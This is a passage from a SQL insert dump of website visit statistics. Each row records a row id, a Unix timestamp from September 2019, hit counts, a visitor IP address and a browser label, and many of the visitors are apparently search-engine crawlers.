8763,1568262257,2,2,0,0,'192.96.203.70','other'),(448764,1568263169,1,1,0,0,'66.249.66.134','chrome'),(448765,1568263382,1,1,0,0,'149.28.121.119','chrome'),(448766,1568263475,1,1,0,0,'62.205.134.182','other'),(448767,1568263686,1,1,0,0,'54.208.102.37','other'),(448768,1568263688,1,1,0,0,'107.21.1.8','other'),(448769,1568264749,1,1,0,0,'178.171.60.223','chrome'),(448770,1568265611,1,1,0,0,'8.29.198.27','other'),(448771,1568265661,1,1,0,0,'66.249.66.134','chrome'),(448772,1568265831,2,2,0,0,'66.249.66.138','chrome'),(448773,1568265959,1,1,0,0,'8.29.198.25','other'),(448774,1568266283,1,1,0,0,'40.77.167.23','other'),(448775,1568266957,2,2,0,0,'66.249.66.134','chrome'),(448776,1568267541,1,1,0,0,'66.249.66.138','chrome'),(448777,1568267726,1,1,0,0,'157.55.39.206','other'),(448778,1568267872,1,1,0,0,'141.8.188.29','other'),(448779,1568268343,2,2,0,0,'66.249.66.134','chrome'),(448780,1568268982,1,1,0,0,'91.196.178.73','chrome'),(448781,1568269172,1,1,0,0,'5.45.207.19','other'),(448782,1568269354,1,1,0,0,'66.249.66.134','chrome'),(448783,1568269423,1,1,0,0,'66.249.66.136','chrome'),(448784,1568270405,1,1,0,0,'91.196.178.92','chrome'),(448785,1568270696,1,1,0,0,'141.8.188.29','other'),(448786,1568270779,1,1,0,0,'66.249.66.136','chrome'),(448787,1568271608,1,1,0,0,'46.201.41.103','chrome'),(448788,1568272018,1,1,0,0,'157.55.39.206','other'),(448789,1568272270,1,1,0,0,'66.249.66.136','chrome'),(448790,1568272518,1,1,0,0,'66.249.66.134','chrome'),(448791,1568272696,1,1,0,0,'66.249.66.138','chrome'),(448792,1568273253,1,1,0,0,'207.46.13.160','other'),(448793,1568273670,1,1,0,0,'141.8.188.11','other'),(448794,1568273731,1,1,0,0,'46.211.97.5','chrome'),(448795,1568273840,1,1,0,0,'46.211.121.218','chrome'),(448796,1568274220,1,1,0,0,'91.196.178.73','chrome'),(448797,1568274750,1,1,0,0,'157.55.39.97','other'),(448798,1568276492,2,2,0,0,'8.29.198.25','other'),(448799,1568276653,1,1,0,0,'95.24.9.229','msie'),(448800,1568276659,2,2,0,0,'66.249.66.134','chrome'),(448801,1568276779,1,1,0,0,'157.55.39.97','other'),(448802,1568277187,1,1,0,0,'182.253.115.66','chrome'),(448803,1568278802,1,1,0,0,'207.46.13.160','other'),(448804,1568278962,1,1,0,0,'66.249.66.134','chrome'),(448805,1568281102,2,2,0,0,'91.196.179.134','chrome'),(448806,1568281274,1,1,0,0,'157.55.39.93','other'),(448807,1568281749,2,2,0,0,'66.249.66.136','chrome'),(448808,1568281919,2,2,0,0,'195.10.210.49','chrome'),(448809,1568282115,1,1,0,0,'66.249.66.64','chrome'),(448810,1568282541,1,1,0,0,'87.250.224.47','other'),(448811,1568282554,1,1,0,0,'141.8.188.11','other'),(448812,1568282702,1,1,0,0,'91.196.178.94','firefox'),(448813,1568282822,1,1,0,0,'157.55.39.245','other'),(448814,1568283357,1,1,0,0,'91.196.178.133','chrome'),(448815,1568283474,1,1,0,0,'5.45.207.19','other'),(448816,1568283740,1,1,0,0,'157.55.39.93','other'),(448817,1568284088,1,1,0,0,'66.249.66.138','chrome'),(448818,1568284243,1,1,0,0,'141.8.188.11','other'),(448819,1568284286,1,1,0,0,'157.55.39.245','other'),(448820,1568285141,1,1,0,0,'66.249.66.134','chrome'),(448821,1568285263,3,3,0,0,'66.249.66.138','chrome'),(448822,1568285891,2,2,0,0,'91.196.178.88','chrome'),(448823,1568286156,1,1,0,0,'157.55.39.97','other'),(448824,1568286178,1,1,0,0,'207.46.13.54','other'),(448825,1568286371,1,1,0,0,'5.45.207.19','other'),(448826,1568286728,1,1,0,0,'157.55.39.95','other'),(448827,1568287319,1,1,0,0,'109.74.154.72','chrome'),(448828,1568287372,2,2,0,0,'8.29.198.26','other'),(448829,1568287397,1,1,0,0,'5.188.84.130','chrome'),(448830,1568287640,1,1,0,0,'157.55.39.95','other'),(448831,1568288730,2,2,0,0,'141.8.188.29','other'),(448832,1568288816,1,1,0,0,'66.249.66.136','chrome'),(448833,1568289181,1,1,0,0,'77.222.112.240','chrome'),(448834,1568289979,5,5,0,0,'35.222.15.122','chrome'),(448835,1568290016,3,3,0,0,'35.238.126.21','chrome'),(448836,1568290056,3,3,0,0,'34.66.254.44','chrome'),(448837,1568290069,2,2,0,0,'35.239.126.18','chrome'),(448839,1568290126,1,1,0,0,'35.224.76.10','chrome'),(448840,1568290127,2,2,0,0,'35.224.76.10','chrome'),(448841,1568290704,1,1,0,0,'91.196.177.46','chrome'),(448842,1568290843,1,1,0,0,'66.249.66.138','chrome'),(448843,1568291601,1,1,0,0,'207.46.13.38','other'),(448844,1568292005,1,1,0,0,'66.249.66.136','chrome'),(448845,1568292200,1,1,0,0,'141.8.188.29','other'),(448846,1568292520,1,1,0,0,'66.249.66.138','chrome'),(448847,1568292729,2,2,0,0,'207.46.13.35','other'),(448848,1568292750,1,1,0,0,'66.249.66.66','chrome'),(448849,1568292773,1,1,0,0,'66.249.66.134','chrome'),(448850,1568293143,1,1,0,0,'46.211.130.140','chrome'),(448851,1568294579,1,1,0,0,'66.249.66.68','chrome'),(448852,1568294595,2,2,0,0,'207.46.13.39','other'),(448853,1568294885,5,5,0,0,'141.8.188.29','other'),(448854,1568294967,1,1,0,0,'157.55.39.232','other'),(448855,1568295710,1,1,0,0,'141.8.188.11','other'),(448856,1568295862,1,1,0,0,'91.196.178.94','chrome'),(448857,1568296598,1,1,0,0,'207.46.13.35','other'),(448858,1568296718,1,1,0,0,'207.46.13.39','other'),(448859,1568296969,1,1,0,0,'141.8.188.29','other'),(448860,1568297159,1,1,0,0,'66.249.66.138','chrome'),(448861,1568297177,1,1,0,0,'66.249.66.68','chrome'),(448862,1568297717,1,1,0,0,'212.26.142.194','firefox'),(448863,1568297886,1,1,0,0,'66.249.66.66','chrome'),(448864,1568297934,2,2,0,0,'141.8.188.29','other'),(448865,1568298267,1,1,0,0,'8.29.198.27','other'),(448866,1568298498,1,1,0,0,'141.8.188.11','other'),(448867,1568298542,1,1,0,0,'8.29.198.25','other'),(448868,1568299297,1,1,0,0,'207.46.13.39','other'),(448869,1568299320,1,1,0,0,'141.8.188.29','other'),(448870,1568299772,1,1,0,0,'66.249.66.64','chrome'),(448871,1568300349,2,2,0,0,'141.8.188.29','other'),(448872,1568300448,1,1,0,0,'66.249.66.136','chrome'),(448873,1568302083,1,1,0,0,'207.46.13.39','other'),(448874,1568302452,1,1,0,0,'66.249.66.134','chrome'),(448875,1568302524,1,1,0,0,'157.55.39.232','other'),(448876,1568303064,1,1,0,0,'91.196.178.189','chrome'),(448877,1568303548,1,1,0,0,'141.8.188.29','other'),(448878,1568304177,1,1,0,0,'40.77.167.82','other'),(448879,1568304664,1,1,0,0,'66.249.66.64','chrome'),(448880,1568304907,1,1,0,0,'66.249.66.134','chrome'),(448881,1568304967,2,2,0,0,'66.249.66.138','chrome'),(448882,1568305859,1,1,0,0,'141.8.188.49','other'),(448883,1568305886,1,1,0,0,'66.249.66.136','chrome'),(448884,1568306002,1,1,0,0,'40.77.167.82','other'),(448885,1568306585,1,1,0,0,'66.249.66.68','chrome'),(448886,1568306796,1,1,0,0,'66.249.66.138','chrome'),(448887,1568306957,1,1,0,0,'141.8.188.11','other'),(448888,1568307053,1,1,0,0,'141.8.188.29','other'),(448889,1568307504,1,1,0,0,'66.249.66.64','chrome'),(448890,1568308500,2,2,0,0,'207.46.13.35','other'),(448891,1568309144,2,2,0,0,'8.29.198.26','other'),(448892,1568309242,1,1,0,0,'66.249.66.138','chrome'),(448893,1568309246,1,1,0,0,'66.249.66.136','chrome'),(448894,1568309857,1,1,0,0,'40.77.167.82','other'),(448895,1568311122,1,1,0,0,'17.58.97.184','other'),(448896,1568311265,1,1,0,0,'66.249.66.136','chrome'),(448897,1568311324,1,1,0,0,'78.109.29.23','chrome'),(448898,1568312153,1,1,0,0,'157.55.39.72','other'),(448899,1568312156,1,1,0,0,'157.55.39.232','other'),(448900,1568312162,2,2,0,0,'157.55.39.108','other'),(448901,1568312340,1,1,0,0,'66.249.66.66','chrome'),(448902,1568312344,1,1,0,0,'66.249.66.138','chrome'),(448903,1568312492,1,1,0,0,'66.249.66.136','chrome'),(448904,1568312712,1,1,0,0,'66.249.66.64','chrome'),(448905,1568313142,3,3,0,0,'157.55.39.232','other'),(448906,1568313146,3,3,0,0,'157.55.39.108','other'),(448907,1568313541,2,2,0,0,'157.55.39.72','other'),(448908,1568313717,1,1,0,0,'141.8.188.11','other'),(448909,1568314708,1,1,0,0,'66.249.66.138','chrome'),(448910,1568314795,1,1,0,0,'91.196.178.12','chrome'),(448911,1568314925,1,1,0,0,'18.231.116.156','chrome'),(448912,1568315792,2,2,0,0,'207.46.13.145','other'),(448913,1568315930,1,1,0,0,'141.8.188.29','other'),(448914,1568316036,1,1,0,0,'66.249.66.138','chrome'),(448915,1568317015,2,2,0,0,'66.249.66.136','chrome'),(448916,1568317028,1,1,0,0,'66.249.66.138','chrome'),(448917,1568317815,2,2,0,0,'40.77.167.102','other'),(448918,1568318287,1,1,0,0,'141.8.188.11','other'),(448919,1568318461,1,1,0,0,'207.46.13.145','other'),(448920,1568318726,1,1,0,0,'157.55.39.72','other'),(448921,1568319318,1,1,0,0,'141.8.188.11','other'),(448922,1568319429,1,1,0,0,'66.249.66.66','chrome'),(448923,1568319893,1,1,0,0,'5.255.253.25','other'),(448924,1568320009,2,2,0,0,'8.29.198.27','other'),(448925,1568320431,1,1,0,0,'141.8.188.11','other'),(448926,1568320676,1,1,0,0,'157.55.39.72','other'),(448927,1568321143,1,1,0,0,'66.249.66.136','chrome'),(448928,1568321600,1,1,0,0,'13.66.139.0','other'),(448929,1568322290,1,1,0,0,'66.249.66.134','chrome'),(448930,1568322985,1,1,0,0,'66.249.66.136','chrome'),(448931,1568323614,1,1,0,0,'91.196.178.163','chrome'),(448932,1568324180,1,1,0,0,'66.249.66.66','chrome'),(448933,1568324429,1,1,0,0,'66.249.66.138','chrome'),(448934,1568324443,1,1,0,0,'66.249.66.134','chrome'),(448935,1568324986,1,1,0,0,'207.46.13.145','other'),(448936,1568326520,1,1,0,0,'141.8.142.103','other'),(448937,1568326525,1,1,0,0,'66.249.66.64','chrome'),(448938,1568328291,1,1,0,0,'66.249.66.136','chrome'),(448939,1568328562,1,1,0,0,'66.249.66.138','chrome'),(448940,1568328566,1,1,0,0,'66.249.66.134','chrome'),(448941,1568329056,1,1,0,0,'40.77.167.102','other'),(448942,1568330778,2,2,0,0,'141.8.188.11','other'),(448943,1568330842,1,1,0,0,'141.8.188.29','other'),(448944,1568330877,1,1,0,0,'8.29.198.27','other'),(448945,1568331078,1,1,0,0,'66.249.66.68','chrome'),(448946,1568331120,1,1,0,0,'8.29.198.25','other'),(448947,1568331122,1,1,0,0,'66.249.66.138','chrome'),(448948,1568331181,1,1,0,0,'185.15.56.22','other'),(448949,1568331638,1,1,0,0,'66.249.66.136','chrome'),(448950,1568332334,1,1,0,0,'178.154.171.24','other'),(448951,1568332394,1,1,0,0,'157.55.39.72','other'),(448952,1568333915,1,1,0,0,'141.8.188.29','other'),(448953,1568334581,1,1,0,0,'157.55.39.72','other'),(448954,1568336296,1,1,0,0,'141.8.188.11','other'),(448955,1568336474,1,1,0,0,'40.77.167.20','other'),(448956,1568336582,1,1,0,0,'207.46.13.145','other'),(448957,1568337507,1,1,0,0,'141.8.188.29','other'),(448958,1568338970,1,1,0,0,'40.77.167.20','other'),(448959,1568339005,1,1,0,0,'141.8.188.29','other'),(448960,1568339977,1,1,0,0,'87.250.224.65','other'),(448961,1568340597,1,1,0,0,'40.77.167.217','other'),(448962,1568341302,1,1,0,0,'40.77.167.176','other'),(448963,1568341737,2,2,0,0,'8.29.198.25','other'),(448964,1568341741,2,2,0,0,'40.77.167.217','other'),(448965,1568342482,1,1,0,0,'95.108.181.94','other'),(448966,1568342691,1,1,0,0,'207.46.13.136','other'),(448967,1568343441,1,1,0,0,'40.77.167.20','other'),(448968,1568343555,1,1,0,0,'141.8.188.29','other'),(448969,1568344832,1,1,0,0,'213.180.203.17','other'),(448970,1568345282,1,1,0,0,'46.211.110.190','chrome'),(448971,1568345599,1,1,0,0,'141.8.188.29','other'),(448972,1568346575,2,2,0,0,'40.77.167.217','other'),(448973,1568347265,1,1,0,0,'40.77.167.12','other'),(448974,1568349884,1,1,0,0,'62.205.134.182','other'),(448975,1568350035,1,1,0,0,'141.8.188.11','other'),(448976,1568350189,2,2,0,0,'40.77.167.12','other'),(448977,1568350234,1,1,0,0,'157.55.39.230','other'),(448978,1568350924,1,1,0,0,'209.17.96.186','other'),(448979,1568351273,1,1,0,0,'141.8.142.103','other'),(448980,1568351327,1,1,0,0,'40.77.167.12','other'),(448981,1568351331,1,1,0,0,'40.77.167.217','other'),(448982,1568351834,1,1,0,0,'109.169.206.109','chrome'),(448983,1568352259,1,1,0,0,'13.66.139.0','other'),(448984,1568352378,1,1,0,0,'91.209.11.236','other'),(448985,1568352596,1,1,0,0,'8.29.198.26','other'),(448986,1568352829,1,1,0,0,'8.29.198.27','other'),(448987,1568353949,2,2,0,0,'207.46.13.137','other'),(448988,1568353975,1,1,0,0,'95.108.181.75','other'),(448989,1568355579,1,1,0,0,'141.8.188.29','other'),(448990,1568355715,1,1,0,0,'40.77.167.12','other'),(448991,1568356212,1,1,0,0,'46.174.121.173','firefox'),(448992,1568358544,1,1,0,0,'141.8.188.11','other'),(448993,1568358601,1,1,0,0,'5.45.207.79','other'),(448994,1568359355,1,1,0,0,'141.8.188.29','other'),(448995,1568359370,2,2,0,0,'91.196.178.33','chrome'),(448996,1568359382,1,1,0,0,'40.77.167.104','other'),(448997,1568359387,1,1,0,0,'207.46.13.137','other'),(448998,1568359480,1,1,0,0,'37.53.90.175','chrome'),(448999,1568359869,1,1,0,0,'81.30.164.218','chrome'),(449000,1568359919,1,1,0,0,'141.170.226.217','chrome'),(449001,1568360714,1,1,0,0,'141.8.188.29','other'),(449002,1568360965,1,1,0,0,'157.55.39.230','other'),(449003,1568361495,2,2,0,0,'78.46.105.172','other'),(449004,1568361902,1,1,0,0,'141.8.188.29','other'),(449005,1568362367,2,2,0,0,'40.77.167.104','other'),(449006,1568363460,2,2,0,0,'8.29.198.26','other'),(449007,1568363595,1,1,0,0,'40.77.167.104','other'),(449008,1568364844,2,2,0,0,'141.8.188.11','other'),(449009,1568365713,2,2,0,0,'157.55.39.230','other'),(449010,1568365739,1,1,0,0,'66.249.66.134','chrome'),(449011,1568367331,1,1,0,0,'95.135.234.91','chrome'),(449012,1568367383,1,1,0,0,'207.46.13.190','other'),(449013,1568367445,1,1,0,0,'87.250.224.65','other'),(449014,1568368158,1,1,0,0,'91.196.177.134','chrome'),(449015,1568368394,1,1,0,0,'40.77.167.104','other'),(449016,1568369696,1,1,0,0,'40.77.167.104','other'),(449017,1568370606,1,1,0,0,'207.46.13.154','other'),(449018,1568370984,1,1,0,0,'2.95.181.156','chrome'),(449019,1568371595,1,1,0,0,'83.170.203.202','chrome'),(449020,1568371791,1,1,0,0,'207.46.13.154','other'),(449021,1568372366,1,1,0,0,'193.19.152.90','chrome'),(449022,1568373326,1,1,0,0,'109.74.154.72','chrome'),(449023,1568374320,2,2,0,0,'8.29.198.26','other'),(449024,1568376203,1,1,0,0,'157.55.39.141','other'),(449025,1568376508,3,3,0,0,'146.148.88.40','chrome'),(449026,1568376522,3,3,0,0,'34.67.63.224','chrome'),(449027,1568376534,3,3,0,0,'35.238.2.116','chrome'),(449028,1568376833,1,1,0,0,'46.211.129.112','chrome'),(449029,1568376856,1,1,0,0,'207.46.13.190','other'),(449030,1568376860,1,1,0,0,'207.46.13.48','other'),(449031,1568377633,1,1,0,0,'31.13.127.27','other'),(449032,1568377635,1,1,0,0,'31.13.127.11','other'),(449033,1568377668,1,1,0,0,'31.13.127.8','other'),(449034,1568377669,1,1,0,0,'31.13.127.16','other'),(449036,1568377702,1,1,0,0,'173.252.127.9','other'),(449037,1568377819,1,1,0,0,'207.46.13.207','other'),(449038,1568377958,1,1,0,0,'91.196.178.133','chrome'),(449039,1568378196,1,1,0,0,'178.20.152.18','firefox'),(449040,1568378304,2,2,0,0,'91.209.11.236','other'),(449041,1568378457,1,1,0,0,'95.108.213.4','other'),(449042,1568378573,1,1,0,0,'5.188.84.130','chrome'),(449043,1568379175,1,1,0,0,'91.196.178.72','chrome'),(449044,1568379987,1,1,0,0,'5.45.207.19','other'),(449045,1568380732,1,1,0,0,'40.77.167.213','other'),(449046,1568381560,1,1,0,0,'141.8.188.29','other'),(449047,1568382015,1,1,0,0,'40.77.167.192','other'),(449048,1568383476,2,2,0,0,'207.46.13.207','other'),(449049,1568384176,1,1,0,0,'141.8.188.29','other'),(449050,1568384241,1,1,0,0,'5.45.207.19','other'),(449051,1568385176,1,1,0,0,'8.29.198.27','other'),(449052,1568385404,1,1,0,0,'8.29.198.26','other'),(449053,1568385679,1,1,0,0,'87.250.224.47','other'),(449054,1568386110,1,1,0,0,'91.196.178.131','firefox'),(449055,1568386978,1,1,0,0,'5.45.207.79','other'),(449056,1568387412,1,1,0,0,'207.46.13.176','other'),(449057,1568388046,1,1,0,0,'157.55.39.141','other'),(449058,1568388415,1,1,0,0,'207.46.13.176','other'),(449059,1568388520,5,5,0,0,'88.99.2.203','other'),(449060,1568389489,1,1,0,0,'88.99.2.203','other'),(449061,1568390188,1,1,0,0,'207.46.13.176','other'),(449062,1568390390,1,1,0,0,'88.99.2.203','other'),(449063,1568391033,1,1,0,0,'130.180.218.245','chrome'),(449064,1568391199,1,1,0,0,'188.163.19.102','other'),(449065,1568391226,1,1,0,0,'207.46.13.176','other'),(449066,1568391348,1,1,0,0,'88.99.2.203','other'),(449067,1568391510,1,1,0,0,'157.55.39.141','other'),(449068,1568391783,1,1,0,0,'91.196.178.173','chrome'),(449069,1568392741,1,1,0,0,'213.180.203.9','other'),(449070,1568393059,1,1,0,0,'207.46.13.176','other'),(449071,1568394032,2,2,0,0,'207.46.13.85','other'),(449072,1568396020,3,3,0,0,'46.211.74.1','chrome'),(449073,1568396054,1,1,0,0,'8.29.198.26','other'),(449074,1568396067,1,1,0,0,'141.8.188.29','other'),(449075,1568396195,1,1,0,0,'207.46.13.176','other'),(449076,1568396258,1,1,0,0,'8.29.198.25','other'),(449077,1568397425,1,1,0,0,'207.46.13.176','other'),(449078,1568398756,1,1,0,0,'141.8.188.29','other'),(449079,1568399223,1,1,0,0,'207.46.13.183','other'),(449080,1568399469,1,1,0,0,'37.204.247.58','msie'),(449081,1568400074,1,1,0,0,'40.77.167.153','other'),(449082,1568400246,1,1,0,0,'37.73.186.9','chrome'),(449083,1568401802,1,1,0,0,'40.77.167.140','other'),(449084,1568402325,1,1,0,0,'91.196.178.131','firefox'),(449085,1568404171,1,1,0,0,'207.46.13.183','other'),(449086,1568405577,1,1,0,0,'141.8.188.29','other'),(449087,1568405592,1,1,0,0,'213.180.203.17','other'),(449088,1568405663,1,1,0,0,'207.46.13.183','other'),(449089,1568406637,1,1,0,0,'40.77.167.153','other'),(449090,1568406915,1,1,0,0,'8.29.198.27','other'),(449091,1568406934,1,1,0,0,'141.8.188.29','other'),(449092,1568406954,1,1,0,0,'141.8.142.108','other'),(449093,1568407111,1,1,0,0,'8.29.198.26','other'),(449094,1568408578,1,1,0,0,'157.55.39.146','other'),(449095,1568409739,2,2,0,0,'141.8.188.29','other'),(449096,1568410137,1,1,0,0,'40.77.167.153','other'),(449097,1568410532,1,1,0,0,'91.196.178.161','chrome'),(449098,1568411566,1,1,0,0,'157.55.39.146','other'),(449099,1568411790,2,2,0,0,'141.8.188.11','other'),(449100,1568412286,1,1,0,0,'95.108.213.4','other'),(449101,1568412308,1,1,0,0,'141.8.188.29','other'),(449102,1568412395,1,1,0,0,'141.8.142.103','other'),(449103,1568413620,1,1,0,0,'46.211.73.176','chrome'),(449104,1568414959,1,1,0,0,'207.46.13.183','other'),(449105,1568417421,1,1,0,0,'141.8.188.29','other'),(449106,1568417768,1,1,0,0,'8.29.198.26','other'),(449107,1568417963,1,1,0,0,'8.29.198.25','other'),(449108,1568418902,1,1,0,0,'141.8.188.11','other'),(449109,1568419960,1,1,0,0,'141.8.188.11','other'),(449110,1568420031,1,1,0,0,'5.45.207.79','other'),(449111,1568420486,1,1,0,0,'209.17.96.50','other'),(449112,1568421440,1,1,0,0,'157.55.39.146','other'),(449113,1568422409,1,1,0,0,'157.55.39.110','other'),(449114,1568422466,1,1,0,0,'157.55.39.131','other'),(449115,1568423597,1,1,0,0,'87.250.224.107','other'),(449116,1568424277,1,1,0,0,'157.55.39.110','other'),(449117,1568425577,1,1,0,0,'157.55.39.131','other'),(449118,1568426097,1,1,0,0,'141.8.188.29','other'),(449119,1568426555,1,1,0,0,'13.66.139.0','other'),(449120,1568426610,1,1,0,0,'157.55.39.110','other'),(449121,1568426786,1,1,0,0,'40.77.167.227','other'),(449122,1568428618,1,1,0,0,'8.29.198.26','other'),(449123,1568428810,1,1,0,0,'8.29.198.27','other'),(449124,1568431790,1,1,0,0,'141.8.188.29','other'),(449125,1568432777,1,1,0,0,'141.8.188.29','other'),(449126,1568434192,1,1,0,0,'5.45.207.19','other'),(449127,1568434244,1,1,0,0,'207.46.13.164','other'),(449128,1568434541,1,1,0,0,'141.8.188.29','other'),(449129,1568435509,1,1,0,0,'141.8.188.29','other'),(449130,1568436320,1,1,0,0,'157.55.39.206','other'),(449131,1568436361,1,1,0,0,'62.205.134.182','other'),(449132,1568437881,1,1,0,0,'171.25.193.77','firefox'),(449133,1568439474,1,1,0,0,'8.29.198.26','other'),(449134,1568439660,1,1,0,0,'8.29.198.27','other'),(449135,1568440398,2,2,0,0,'40.77.167.134','other'),(449136,1568441687,1,0,1,0,'66.249.66.138',''),(449137,1568443234,1,1,0,0,'87.250.224.47','other'),(449138,1568444447,1,1,0,0,'157.55.39.206','other'),(449139,1568444595,1,1,0,0,'141.8.188.29','other'),(449140,1568444625,1,1,0,0,'5.45.207.79','other'),(449141,1568444751,2,2,0,0,'207.46.13.164','other'),(449142,1568444935,3,3,0,0,'40.77.167.134','other'),(449143,1568445829,2,2,0,0,'207.46.13.164','other'),(449144,1568447126,1,1,0,0,'157.55.39.206','other'),(449145,1568447246,1,1,0,0,'87.250.224.118','other'),(449146,1568447486,1,1,0,0,'178.154.171.60','other'),(449147,1568450191,1,1,0,0,'207.46.13.42','other'),(449148,1568450325,2,2,0,0,'8.29.198.25','other'),(449149,1568451318,1,1,0,0,'141.8.188.11','other'),(449150,1568452566,1,1,0,0,'141.8.188.11','other'),(449151,1568452770,1,1,0,0,'141.8.188.29','other'),(449152,1568452784,1,1,0,0,'5.45.207.79','other'),(449153,1568452974,1,1,0,0,'91.196.178.97','chrome'),(449154,1568453248,1,1,0,0,'157.55.39.206','other'),(449155,1568454042,1,1,0,0,'87.250.224.47','other'),(449156,1568454952,1,1,0,0,'66.249.66.138','chrome'),(449157,1568455582,1,1,0,0,'66.249.66.136','chrome'),(449158,1568456963,1,1,0,0,'157.55.39.254','other'),(449159,1568457917,2,2,0,0,'163.172.76.38','chrome'),(449160,1568458317,2,2,0,0,'207.46.13.220','other'),(449161,1568459732,1,1,0,0,'109.74.154.72','chrome'),(449162,1568460256,1,1,0,0,'141.8.188.29','other'),(449163,1568460416,1,1,0,0,'40.77.167.62','other'),(449164,1568460957,1,1,0,0,'157.55.39.254','other'),(449165,1568461185,1,1,0,0,'8.29.198.26','other'),(449166,1568461379,1,1,0,0,'8.29.198.27','other'),(449167,1568462162,2,2,0,0,'207.46.13.51','other'),(449168,1568462167,1,1,0,0,'207.46.13.5','other'),(449169,1568462688,1,1,0,0,'141.8.188.11','other'),(449170,1568463065,1,1,0,0,'35.238.171.117','chrome'),(449171,1568463066,2,2,0,0,'35.238.171.117','chrome'),(449172,1568463099,2,2,0,0,'34.68.208.163','chrome'),(449173,1568463097,1,1,0,0,'34.68.208.163','chrome'),(449174,1568463110,4,4,0,0,'35.238.241.190','chrome'),(449176,1568463132,2,2,0,0,'35.202.200.244','chrome'),(449177,1568463131,1,1,0,0,'35.202.200.244','chrome'),(449178,1568463147,3,3,0,0,'34.67.105.82','chrome'),(449179,1568464038,1,1,0,0,'141.8.188.29','other'),(449180,1568464916,1,1,0,0,'207.46.13.51','other'),(449181,1568465363,1,1,0,0,'207.46.13.5','other'),(449182,1568466422,1,1,0,0,'207.46.13.5','other'),(449183,1568467983,2,2,0,0,'141.8.188.29','other'),(449184,1568469375,1,1,0,0,'5.45.207.79','other'),(449185,1568469936,1,1,0,0,'157.55.39.124','other'),(449186,1568470642,1,1,0,0,'141.8.188.11','other'),(449187,1568470953,1,1,0,0,'40.77.167.90','other'),(449188,1568471290,1,1,0,0,'198.27.121.92','firefox'),(449189,1568471903,1,1,0,0,'95.108.181.94','other'),(449190,1568472041,1,1,0,0,'8.29.198.26','other'),(449191,1568472227,1,1,0,0,'8.29.198.27','other'),(449192,1568472560,1,1,0,0,'13.66.139.0','other'),(449193,1568473186,1,1,0,0,'40.77.167.90','other'),(449194,1568473300,1,1,0,0,'141.8.188.11','other'),(449195,1568473390,1,1,0,0,'91.196.178.73','firefox'),(449196,1568473964,1,1,0,0,'173.252.127.13','other'),(449197,1568474669,1,1,0,0,'5.45.207.19','other'),(449198,1568475123,1,1,0,0,'207.46.13.5','other'),(449199,1568475894,1,1,0,0,'40.77.167.48','other'),(449200,1568476303,1,1,0,0,'37.9.113.43','other'),(449201,1568476307,1,1,0,0,'141.8.188.29','other'),(449202,1568479053,1,1,0,0,'188.170.74.45','chrome'),(449203,1568479187,1,1,0,0,'141.8.188.11','other'),(449204,1568479444,1,1,0,0,'157.55.39.181','other'),(449205,1568480479,1,1,0,0,'207.46.13.5','other'),(449206,1568480712,1,1,0,0,'157.55.39.181','other'),(449207,1568481719,1,1,0,0,'95.108.181.75','other'),(449208,1568481869,1,1,0,0,'66.249.66.138','chrome'),(449209,1568482891,1,1,0,0,'8.29.198.26','other'),(449210,1568483081,1,1,0,0,'8.29.198.27','other'),(449211,1568484594,1,1,0,0,'141.8.188.11','other'),(449212,1568485075,1,1,0,0,'40.77.167.126','other'),(449213,1568485273,1,1,0,0,'207.46.13.155','other'),(449214,1568486393,1,1,0,0,'207.46.13.118','other'),(449215,1568487338,1,1,0,0,'207.46.13.155','other'),(449216,1568488047,1,1,0,0,'66.249.66.134','chrome'),(449217,1568488218,1,1,0,0,'157.55.39.70','other'),(449218,1568490350,1,1,0,0,'40.77.167.126','other'),(449219,1568490531,1,1,0,0,'141.8.188.11','other'),(449220,1568491964,1,1,0,0,'87.250.224.65','other'),(449221,1568491993,1,1,0,0,'87.250.224.47','other'),(449222,1568492985,2,2,0,0,'40.77.167.25','other'),(449223,1568493367,2,2,0,0,'141.8.188.29','other'),(449224,1568493750,1,1,0,0,'8.29.198.27','other'),(449225,1568493942,1,1,0,0,'8.29.198.25','other'),(449226,1568494049,1,1,0,0,'40.77.167.172','other'),(449227,1568495842,1,1,0,0,'157.55.39.60','other'),(449228,1568496086,1,1,0,0,'157.55.39.202','other'),(449229,1568497213,1,1,0,0,'40.77.167.25','other'),(449230,1568499078,1,1,0,0,'157.55.39.202','other'),(449231,1568499226,1,1,0,0,'66.249.66.134','chrome'),(449232,1568500257,2,2,0,0,'157.55.39.202','other'),(449233,1568500510,2,2,0,0,'66.249.66.134','chrome'),(449234,1568500634,1,1,0,0,'66.249.66.136','chrome'),(449235,1568501031,1,1,0,0,'5.255.253.16','other'),(449236,1568502316,1,1,0,0,'157.55.39.60','other'),(449237,1568502781,1,1,0,0,'66.249.66.136','chrome'),(449238,1568502802,1,1,0,0,'66.249.66.68','chrome'),(449239,1568502909,2,2,0,0,'157.55.39.202','other'),(449240,1568504214,1,1,0,0,'66.249.66.134','chrome'),(449241,1568504599,1,1,0,0,'8.29.198.25','other'),(449242,1568504603,1,1,0,0,'157.55.39.60','other'),(449243,1568504788,1,1,0,0,'8.29.198.27','other'),(449244,1568505141,1,0,1,0,'66.249.66.136',''),(449245,1568505568,1,1,0,0,'13.66.139.0','other'),(449246,1568506099,1,1,0,0,'87.250.224.65','other'),(449247,1568506524,1,1,0,0,'141.8.188.29','other'),(449248,1568507031,1,1,0,0,'157.55.39.91','other'),(449249,1568507481,1,1,0,0,'5.255.253.25','other'),(449250,1568507857,1,1,0,0,'157.55.39.60','other'),(449251,1568508222,1,1,0,0,'178.158.248.67','chrome'),(449252,1568509815,1,1,0,0,'157.55.39.92','other'),(449253,1568510028,2,2,0,0,'66.249.66.134','chrome'),(449254,1568510060,1,1,0,0,'141.8.188.29','other'),(449255,1568510079,1,1,0,0,'5.45.207.79','other'),(449256,1568510098,1,1,0,0,'66.249.66.138','chrome'),(449257,1568510552,1,1,0,0,'207.46.13.221','other'),(449258,1568511567,1,1,0,0,'157.55.39.91','other'),(449259,1568512293,1,1,0,0,'54.149.58.142','other'),(449260,1568512341,1,1,0,0,'157.55.39.60','other'),(449261,1568512525,1,1,0,0,'91.209.11.236','other'),(449262,1568512881,1,1,0,0,'87.250.224.107','other'),(449263,1568513308,1,1,0,0,'37.9.113.103','other'),(449264,1568514111,1,1,0,0,'5.45.207.19','other'),(449265,1568515154,1,1,0,0,'66.249.66.134','chrome'),(449266,1568515170,1,1,0,0,'157.55.39.177','other'),(449267,1568515443,1,1,0,0,'8.29.198.26','other'),(449268,1568515625,1,1,0,0,'8.29.198.25','other'),(449269,1568516296,1,1,0,0,'40.77.167.215','other'),(449270,1568516533,1,1,0,0,'138.246.253.5','chrome'),(449271,1568517002,1,1,0,0,'178.154.171.60','other'),(449272,1568517053,1,1,0,